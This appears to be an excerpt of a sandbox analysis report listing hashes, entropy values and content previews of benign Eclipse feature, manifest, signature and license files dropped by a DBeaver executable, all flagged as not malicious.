      SHA-512:486E7138B5B40ED0E4007C2DD83CE94CA447AEE94C968BC4C384FE6D6F2B69FA351CD3106CE88EE2E4EF120DB9BB6C4E8990FA9C104DA2903C97B7F2F8270078
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.837313047507273
      Encrypted:false
      SSDEEP:
      MD5:D9E3F0A9879DC37197275ABA58BA8EF4
      SHA1:64DD2DD5F705B646BB429DFA7BD1C9955ABF3BE8
      SHA-256:D814F76ECE7B9C8F923B3C903C77D6B8F4A744DDBBE808F93F04B8FB870E6DC1
      SHA-512:EBBE735E09A738C7F0E0291BC2F943BCFCA9C08DBB9457DEF4F72EF5A8DA32B618A7D106050808266D19ED3CC4C5F0B4684E1AEE0C7502DEF5EEEF021BBDC7AD
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: N0m3a2xxVwFUyGm+SSk+OHe38KIebhoej5IH2zZfGc0=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: Aw29GExzEg/sIl8iBqXasaIO7+eAiEc3ppENGscIxxA=....Name: feature.properties..SHA-256-Digest: ldtiv5bPp61+DbQuWhJ+reRNO85zGPCM4TS+WyBKs+A=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.792538257869638
      Encrypted:false
      SSDEEP:
      MD5:C6FBED72E6ECB2825F62523A00C195F4
      SHA1:1FC03D2B2A10FCD0136672C807D755CF96F77E9B
      SHA-256:3749B76B6C71570154C869BE49293E3877B7F0A21E6E1A1E8F9207DB365F19CD
      SHA-512:5F784C0149471B8AB65C62E880EBE7DCAAB01303B65DB97E79FE7E4B712E78294076CEBFD12A712A2380E786CFA4230FE03BB0F1604F7BD9D76DE88A028D4C87
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: 9xGog56KdSXPz7BE9upRMC00USF/IRkKWZOHykGtXtk=....Name: feature.properties..SHA-256-Digest: B6OXLTaNH1Xxos80NGLBuU8vk/zycXNAF5vWqw+rzII=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9297
      Entropy (8bit):5.011829859060019
      Encrypted:false
      SSDEEP:
      MD5:2B4C03670468658D31CA9356976BF9F7
      SHA1:B4CAD85F4466E3B174DC6AFC3A1980D098A02137
      SHA-256:07A3972D368D1F55F1A2CF343462C1B94F2F93FCF2717340179BD6AB0FABCC82
      SHA-512:99217B2786B0CE08D8D0D5625C33D26CB80F5442A7EBFB6B81DA767F26063084FF38C5C421B975C085BEA634E0E1BCD23894A5EF3CDACAED9BC4CFEA54FB8696
      Malicious:false
      Reputation:unknown
      Preview:# /**.# * Copyright (c) 2002-2011 IBM Corporation and others..# * All rights reserved. This program and the accompanying materials.# * are made available under the terms of the Eclipse Public License v2.0.# * which accompanies this distribution, and is available at.# * http://www.eclipse.org/legal/epl-v20.html.# * .# * Contributors: .# * IBM - Initial API and implementation.# */..# NLS_MESSAGEFORMAT_VAR..# "featureName" property - name of the feature.featureName=EMF Common..# "providerName" property - name of the company that provides the feature.providerName=Eclipse Modeling Project..# "description" property - description of the feature.description=Common platform-independent utilities used throughout EMF, including collection classes, notifiers, adapters, and commands...EMFUpdateSiteName=Eclipse Modeling Framework Updates..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML page.licenseURL=licen
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1168
      Entropy (8bit):4.929038617627162
      Encrypted:false
      SSDEEP:
      MD5:D651FE4C8B567E6EA2F9D531DF9C3CA8
      SHA1:C8CC0FFA0034A2253F3E2C7F153EA014752713FB
      SHA-256:F711A8839E8A7525CFCFB044F6EA51302D3451217F21190A599387CA41AD5ED9
      SHA-512:3725D0D408BDAE32CF1A8C78E546574769610EF6223759206966EA4830984DAE412FF96CFD0B536FFB6548428A7024D2740529C63D5570960B2F97D64DDC2675
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.emf.common". label="%featureName". version="2.30.0.v20230916-0637". provider-name="%providerName">.. <description>. %description. </description>.. <copyright url="http://www.eclipse.org/legal/epl-v20.html">. Copyright (c) 2002-2018 IBM Corporation and others..All rights reserved. This program and the accompanying materials.are made available under the terms of the Eclipse Public License v2.0.which accompanies this distribution, and is available at.http://www.eclipse.org/legal/epl-v20.html. </copyright>.. <license url="%licenseURL">. %license. </license>.. <url>. <update label="%EMFUpdateSiteName" url="https://download.eclipse.org/modeling/emf/emf/builds/"/>. <discovery label="%EMFUpdateSiteName" url="https://download.eclipse.org/modeling/emf/emf/builds/"/>. </url>.. <requires>. <import plugin="org.eclipse.core.runtime"/>. </requires>.. <plugin.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):9260
      Entropy (8bit):5.236131409835363
      Encrypted:false
      SSDEEP:
      MD5:618D2440FC58E15450A9416CD6804477
      SHA1:C501B7CE0B1EE46AD86FFF436BCB7DC2CD549DC2
      SHA-256:0EFE4D6EB579F748857A93C5A781C3000F70F339074B29D15B914213E14B1D53
      SHA-512:7B48C3911305756AD7D7BF65E5254C5151F619FDD16CD80BE01208A8E868F02066A91A872C17824537E6173D9E0CB81C1C5B0081CEA6C1CD585C91BCDDF6438A
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="ISO-8859-1" ?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />.<title>Eclipse Foundation Software User Agreement</title>.</head>..<body lang="EN-US">..<h2>Eclipse Foundation Software User Agreement</h2>..<p>November 22, 2017</p>...<h3>Usage Of Content</h3>...<p>THE ECLIPSE FOUNDATION MAKES AVAILABLE SOFTWARE, DOCUMENTATION,...INFORMATION AND/OR OTHER MATERIALS FOR OPEN SOURCE PROJECTS...(COLLECTIVELY &quot;CONTENT&quot;). USE OF THE CONTENT IS GOVERNED BY...THE TERMS AND CONDITIONS OF THIS AGREEMENT AND/OR THE TERMS AND...CONDITIONS OF LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED...BELOW. BY USING THE CONTENT, YOU AGREE THAT YOUR USE OF THE CONTENT IS...GOVERNED BY THIS AGREEMENT AND/OR THE TERMS AND CONDITIONS OF ANY...APPLICABLE LICENSE AGREEMENTS OR NOTICES IN
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.570169290885261
      Encrypted:false
      SSDEEP:
      MD5:2EDD73D515F118CAAB262C17979702D6
      SHA1:AAA5E48229A980E5A0EE802E7E07E74FFC753796
      SHA-256:EE07C9B7EB0AE63B0C52F5DD61286C494E8E397DE19097860A0CC72190C18518
      SHA-512:B5817244A90ED51021B95EA8C53E8E42082BAF9ED613DB1183CDD82EB7CD460EC0253508833CC4E4EB4658812F0D832B86574A23A8F5CBF9E8C54A82AA705CAA
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.8154080545542985
      Encrypted:false
      SSDEEP:
      MD5:7D926C24CEEA43FD26D0019046661020
      SHA1:AE3D05D1C89811417A7920EA171B4C8AB374F59B
      SHA-256:ED7529759E4B00583116C4D37033580BF2ABE952B525DAF0DD22FE3865CD59A0
      SHA-512:8490908ECB5AEDC86861EBE5AF33F1C6D47E3A581E8EBAABE5CA6BE3B7A5366D2D2D9462D05D46B998431686B061F4D90E07CFC477F1F1609BC4ABBACDD2D13C
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: iPjlzyHFNF6Qkr2Q915o9F7CcTZvDyt0Dj6aob2sRe8=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: arIDr3lPaIDphVQa9UUyjpmiZhUZD+ZOuKKiVgwcCcU=....Name: feature.properties..SHA-256-Digest: gyfnyzIdZplfdoduOVCMCGcSqavo7lDAucngkRrpnQA=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.750774460577398
      Encrypted:false
      SSDEEP:
      MD5:66CEC278B519A8B5F14B343533F38A06
      SHA1:47FE5FC23A2EC2E3A72B102446453271E146B461
      SHA-256:88F8E5CF21C5345E9092BD90F75E68F45EC271366F0F2B740E3E9AA1BDAC45EF
      SHA-512:D150C791EDD5B261BA40D2A503ED5BCE2876AA0B05C61040ED2212DFF0F47D9A11CC83B50B555D3981BE653069732D3FA716A9EAC89D0B58D04422BBF203B8CF
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: 1Q7+Z0HVB60B0uSzVRFWMQiFeMDDvH0X0XzBFJ8eq6c=....Name: feature.properties..SHA-256-Digest: Kzmk2OWnvAzGvOu5GD3baV/RZuntT3yG5bGJnKK6Jrw=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9318
      Entropy (8bit):5.015438464255682
      Encrypted:false
      SSDEEP:
      MD5:3B93643C8ED6D4C09A7A5A12866273EB
      SHA1:7533D67C66B5F942C417662178569608A90378F6
      SHA-256:2B39A4D8E5A7BC0CC6BCEBB9183DDB695FD166E9ED4F7C86E5B1899CA2BA26BC
      SHA-512:E02F9E77016D5B8D2823EBCD612CD987A35356A0A1AA64344AE8160D68A41286A6B3A21C4BAF0C094F895F454D252343E249E2301BB2C2E7FFF32C9D3DC9B53F
      Malicious:false
      Reputation:unknown
      Preview:# /**.# * Copyright (c) 2002-2011 IBM Corporation and others..# * All rights reserved. This program and the accompanying materials.# * are made available under the terms of the Eclipse Public License v2.0.# * which accompanies this distribution, and is available at.# * http://www.eclipse.org/legal/epl-v20.html.# * .# * Contributors: .# * IBM - Initial API and implementation.# */..# NLS_MESSAGEFORMAT_VAR..# "featureName" property - name of the feature.featureName=EMF - Eclipse Modeling Framework Core Runtime..# "providerName" property - name of the company that provides the feature.providerName=Eclipse Modeling Project..# "description" property - description of the feature.description=The core runtime for EMF, including EMF's common utilities, Ecore, XML/XMI persistence, and the change model...EMFUpdateSiteName=Eclipse Modeling Framework Updates..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1570
      Entropy (8bit):4.86773090502278
      Encrypted:false
      SSDEEP:
      MD5:3BD4BEC363268A4A8A4FE0E19988AFE5
      SHA1:AEA98AE47F3A7E7D83353E10D6813F39DBF648F0
      SHA-256:D50EFE6741D507AD01D2E4B355115631088578C0C3BC7D17D17CC1149F1EABA7
      SHA-512:800B5D7FA7E9D916FF099D4239765367ACB20DDEE049C1A29F0068B3B7CC27A4ACF0EB40B3BA8F83E2B96326D70B8D25815A3583CA61A4BEA72073012F9D22A1
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.emf.ecore". label="%featureName". version="2.36.0.v20231002-1156". provider-name="%providerName">.. <description>. %description. </description>.. <copyright url="http://www.eclipse.org/legal/epl-v20.html">. Copyright (c) 2002-2018 IBM Corporation and others..All rights reserved. This program and the accompanying materials.are made available under the terms of the Eclipse Public License v2.0.which accompanies this distribution, and is available at.http://www.eclipse.org/legal/epl-v20.html. </copyright>.. <license url="%licenseURL">. %license. </license>.. <url>. <update label="%EMFUpdateSiteName" url="https://download.eclipse.org/modeling/emf/emf/builds/"/>. <discovery label="%EMFUpdateSiteName" url="https://download.eclipse.org/modeling/emf/emf/builds/"/>. </url>.. <requires>. <import plugin="org.eclipse.core.runtime"/>. <import plugin="org.eclipse
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.575416149663983
      Encrypted:false
      SSDEEP:
      MD5:4781E69FDEDBD8DA941EA35A35278AB1
      SHA1:3DE037B36245939ACDC7A9847C59597C80A03430
      SHA-256:2ABC4BEEF975D88449C1B5A653D14233CFDAA8A7DE6BBA02A9EF9684D5385310
      SHA-512:3E7FAB0A1901BE33CB9854F3616061C39DF67C6C68D676F9239CA2C0163602175F5A776D07DD9BB0B4C04C0E948987B0BECF1884DC2324016BEEEBB2D732090F
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.84788306782635
      Encrypted:false
      SSDEEP:
      MD5:31ADFB85478F15A838E56F984EE3940C
      SHA1:CDAD4D69D664719744A28758F2FA63B8F3A6F059
      SHA-256:CC204DBDAB0B001C357A08AC95FFD3C55591D85AF4F6FAA0DE92960E295F8EAD
      SHA-512:7EC28ADD08FBB42136116A6C484BFBEAC06E294E6692BD6B109872F22E7C98790E406CFCF4A4CC52B55EC4503F447182D63045ABBE0ACF425B5673E29877C9EF
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: Rsb4M0jCSDD3shnqzrlqaOx34A1SPhkhC6JauOBDIkg=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: PN7/zhUO/FVp2Bzw9gdbi2Cip4f7s0n80Yybnal+qjE=....Name: feature.properties..SHA-256-Digest: pG4953kErleEXoPKx0QPOliVIadXtrGoY1aXaYuEzt8=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.784280053836666
      Encrypted:false
      SSDEEP:
      MD5:41A4D180C3862E037C475E4CCA318BA7
      SHA1:F55C1B321FBD32BD4995AE20A8FA4F632500C11C
      SHA-256:46C6F83348C24830F7B219EACEB96A68EC77E00D523E19210BA25AB8E0432248
      SHA-512:AFE870B4D47E5FF66694E70121560E1DD69B4670A4F6CA7309A89EEE9D21B78F83958512B3C3B4D4E8FBDDDCA7DDC00FA767A6F25621394026BDAA67F32227DC
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: CQSqB3TfIgRO7jrV2ShYqR1zFJkt/uZvymdHaC9g/ZI=....Name: feature.properties..SHA-256-Digest: i2u5poZmcLe4xidpgvYk0ObJhagXoUOQ/kwtyw2XxFo=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10034
      Entropy (8bit):5.031815956555317
      Encrypted:false
      SSDEEP:
      MD5:AF40047C8CCBFEB25155003A32B4AA68
      SHA1:D07D6D7C422038E6C8A7025A0C19423CEA4A3310
      SHA-256:8B6BB9A6866670B7B8C6276982F624D0E6C985A817A14390FE4C2DCB0D97C45A
      SHA-512:CC67281083F21129D960D8751AE6689230D14624238B62BC8731E98B1A76CEBC02D07A29D06C7864299316A187936023CEE589D53C44E76A943B6F3585436B42
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2010, 2013 EclipseSource Inc. and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# EclipseSource - initial API and implementation.###############################################################################.# feature.properties.# contains externalized strings for feature.xml.# "%foo" in feature.xml corresponds to the key "foo" in this file.# java.io.Properties file (ISO 8859-1 with "\" escapes).# This file should be translated...# "featureName" property - name of the feature.featureName=Equinox p2, headless functionalities..# "providerName" property - name of the company that provides the feature.providerName=Eclipse.org - Equinox..description=Provides
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):3715
      Entropy (8bit):4.7160656320218575
      Encrypted:false
      SSDEEP:
      MD5:D8FBC44B9D1854EC1D5EDC778EA0B42B
      SHA1:551698DE559A765D2325B687FB72461DB4BF4EC8
      SHA-256:0904AA0774DF22044EEE3AD5D92858A91D7314992DFEE66FCA6747682F60FD92
      SHA-512:CE0DF568AA0BE7991F2F66CDDED6088C39EB3ABB5F2470A88FABB104F3BAD2A8C6B74038494FB2DC9467D6035447AF12A8B868610209D47147655DD4280CA722
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.equinox.p2.core.feature". label="%featureName". version="1.7.0.v20231112-1314". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import feature="org.eclipse.ecf.core.feature" version="1.4.0" match="compatible"/>. <import feature="org.eclipse.ecf.core.ssl.feature" version="1.1.0" match="compatible"/>. <import feature="org.eclipse.ecf.filetransfer.feature" version="3.13.7" match="compatible"/>. <import feature="org.eclipse.ecf.filetransfer.httpclientjava.feature" version="2.0.0" match="compatible"/>. <import feature="org.eclipse.ecf.filetransfer.httpclient5.feature" version="1.0.0" match="compatible"/>. <import feature="org.eclipse.ecf.filetransfer.ssl.feature" version="1.1.0" match="compatible"/>. </requires>..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9553
      Entropy (8bit):7.570641813533886
      Encrypted:false
      SSDEEP:
      MD5:1309E7DEAA75FAA7B04974325EE23589
      SHA1:D269642D3F03F170A890058CF10F5F28DAFB7B1C
      SHA-256:166077E8E853A402928477C4A469CD1D8A0AF84DFFC14C0E6E73466C6BC00E6C
      SHA-512:C7746B97D8ABAB6474976A01027898475D08B493167D67F97B9DF62C1685E3360C42F615B6DA4339B0E96F7573CF074BD00D791BF0B82C0A2F49D3DE74708F0E
      Malicious:false
      Reputation:unknown
      Preview:0.%M..*.H........%>0.%:...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.8419198971603645
      Encrypted:false
      SSDEEP:
      MD5:EDA9EA9BBFFE18065E1F7551DA1DB2DA
      SHA1:1BFAC81DA268B2D480840D1A73AB507F15BF7B4C
      SHA-256:CDFD9A9BFAC02631AFEE8C1E2785BFBF412409FE3285FF7BA6C3EC7968E4D6EC
      SHA-512:972509412252A707AD060F6D6F878D2D4C999AC637DF135D8F555C2A6081FB31C0C7C3686E12DFC4E7AEFDAACD031037940E5835D6CEEA102D947B9C615CB49B
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: 9zvg82NW5JTbQu7XBN9lWNJssKqur2GGQYoH0WrqaBk=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: +WplSDeLi2yqiQQTk6n9S1hcKA1FmO1eIv4tu9B9/oE=....Name: feature.properties..SHA-256-Digest: LQ/zzSwNUhiO1aMzvytHGf5wDSPyiknuhLyk7IxEiv4=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.741679660400093
      Encrypted:false
      SSDEEP:
      MD5:5D953D6DAEB7F25D0F4210A7B4BC7F11
      SHA1:E54A8EBE21F3D935DD309FBF5B0AABB84A6CF04E
      SHA-256:F73BE0F36356E494DB42EED704DF6558D26CB0AAAEAF6186418A07D16AEA6819
      SHA-512:5AA04F71963508720775395628FB0F3A910AEA62C567968132969C7254143F47A19817F898250A530244C8BBD0BB63879E77B344AE160137FDAA4302F142FC1C
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: GCnPvfbidESonbiU12iroYN2If4Hq67eqloj2itwhQw=....Name: feature.properties..SHA-256-Digest: xy2gh1oY4ENSl2wolTHuVb8aZcX59bcv+lsmQB3+BIU=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10282
      Entropy (8bit):5.026838801965109
      Encrypted:false
      SSDEEP:
      MD5:CAC6244179810A218062E8AA847B8B20
      SHA1:C7D2759DE9BFAAEA4F0F050222391E1CB67810FC
      SHA-256:C72DA0875A18E04352976C289531EE55BF1A65C5F9F5B72FFA5B26401DFE0485
      SHA-512:EC3A4270F0912D18554212775E1852421E9DAF94617C835BBE384FCA10FF3265416655A1C943ED06796C4E65BCA7236F0B5E0C09FB6AAB407A87C257A7E4D00D
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2010, 2011 Tasktop Technologies and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# Tasktop Technologies - initial API and implementation.###############################################################################.# feature.properties.# contains externalized strings for feature.xml.# "%foo" in feature.xml corresponds to the key "foo" in this file.# java.io.Properties file (ISO 8859-1 with "\" escapes).# This file should be translated...# "featureName" property - name of the feature.featureName=Equinox p2, Discovery UI support..# "providerName" property - name of the company that provides the feature.providerName=Eclipse.org - Equinox..# "updateSiteNam
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):706
      Entropy (8bit):4.771950621310986
      Encrypted:false
      SSDEEP:
      MD5:06D3E24A3CBF8F89EFAC08B1942528F3
      SHA1:F7C5FD3A9FB3CB6A024F97C3A4D56A8E795DD44F
      SHA-256:1829CFBDF6E27444A89DB894D768ABA1837621FE07ABAEDEAA5A23DA2B70850C
